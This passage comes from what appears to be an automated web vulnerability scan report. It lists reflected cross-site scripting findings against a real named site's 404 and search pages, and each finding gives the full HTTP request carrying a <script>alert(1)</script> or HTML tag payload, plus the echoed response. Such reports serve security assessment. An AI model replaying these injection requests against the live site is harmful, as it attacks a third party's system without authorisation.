<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult86e21<script>alert(1)</script>bac0f3b21f3/media-chat/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.102. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/4half.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 73cc3<script>alert(1)</script>2766db04561 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat73cc3<script>alert(1)</script>2766db04561/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat73cc3<script>alert(1)</script>2766db04561/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.103. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/4half.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c2cb4<script>alert(1)</script>7816e6101e4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themesc2cb4<script>alert(1)</script>7816e6101e4/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themesc2cb4<script>alert(1)</script>7816e6101e4/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.104. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/4half.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7ab68<script>alert(1)</script>09f33f1e474 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos7ab68<script>alert(1)</script>09f33f1e474/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos7ab68<script>alert(1)</script>09f33f1e474/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.105. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/4half.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e5d7f<script>alert(1)</script>4d51883171 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/imagese5d7f<script>alert(1)</script>4d51883171/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/imagese5d7f<script>alert(1)</script>4d51883171/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.106. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/4half.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 69d9e<script>alert(1)</script>04b72d9a9bd was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/rating69d9e<script>alert(1)</script>04b72d9a9bd/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/rating69d9e<script>alert(1)</script>04b72d9a9bd/4half.gif was not found on this server.</p>
...[SNIP]...

2.107. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/4half.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 18aab<script>alert(1)</script>ad78c33097d was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/rating/4half.gif18aab<script>alert(1)</script>ad78c33097d HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/rating/4half.gif18aab<script>alert(1)</script>ad78c33097d was not found on this server.</p>
...[SNIP]...

2.108. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/4half.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/rating/4half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload abb67<script>alert(1)</script>7488b6d61eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/rating/4half.gif?abb67<script>alert(1)</script>7488b6d61eb=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/rating/4half.gif?abb67<script>alert(1)</script>7488b6d61eb=1 was not found on this server.</p>
...[SNIP]...

2.109. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b514b<script>alert(1)</script>82e6edf5e29 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adultb514b<script>alert(1)</script>82e6edf5e29/media-chat/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adultb514b<script>alert(1)</script>82e6edf5e29/media-chat/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.110. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4f1a9<script>alert(1)</script>6221b70f24 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat4f1a9<script>alert(1)</script>6221b70f24/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat4f1a9<script>alert(1)</script>6221b70f24/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.111. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ac2e5<script>alert(1)</script>8f6529aaa52 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themesac2e5<script>alert(1)</script>8f6529aaa52/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themesac2e5<script>alert(1)</script>8f6529aaa52/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.112. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2c28f<script>alert(1)</script>ba7b9d01eb2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos2c28f<script>alert(1)</script>ba7b9d01eb2/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos2c28f<script>alert(1)</script>ba7b9d01eb2/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.113. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 25df1<script>alert(1)</script>52355aedd8e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images25df1<script>alert(1)</script>52355aedd8e/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images25df1<script>alert(1)</script>52355aedd8e/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.114. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload b04d1<script>alert(1)</script>c4f85c31bfa was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/ratingb04d1<script>alert(1)</script>c4f85c31bfa/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/ratingb04d1<script>alert(1)</script>c4f85c31bfa/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.115. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/search.php [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload dee62<script>alert(1)</script>4a9a296f33d was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/rating/search.phpdee62<script>alert(1)</script>4a9a296f33d?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/rating/search.phpdee62<script>alert(1)</script>4a9a296f33d?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.116. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload f091c<a>0a78219e80e was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/media-chat/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchf091c<a>0a78219e80e&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchf091c<a>0a78219e80e&opt=2 was not found on this server.</p>
...[SNIP]...

2.117. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 1a664<a>299929d50a was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/media-chat/themes/kosmos/images/rating/search.php?keyword=search...1a664<a>299929d50a&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/rating/search.php?keyword=search...1a664<a>299929d50a&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.118. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ba9cc<script>alert(1)</script>31bb10db194 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&ba9cc<script>alert(1)</script>31bb10db194=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&ba9cc<script>alert(1)</script>31bb10db194=1 was not found on this server.</p>
...[SNIP]...

2.119. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 64da7<a>8f5e48ec351 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/media-chat/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=264da7<a>8f5e48ec351 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/
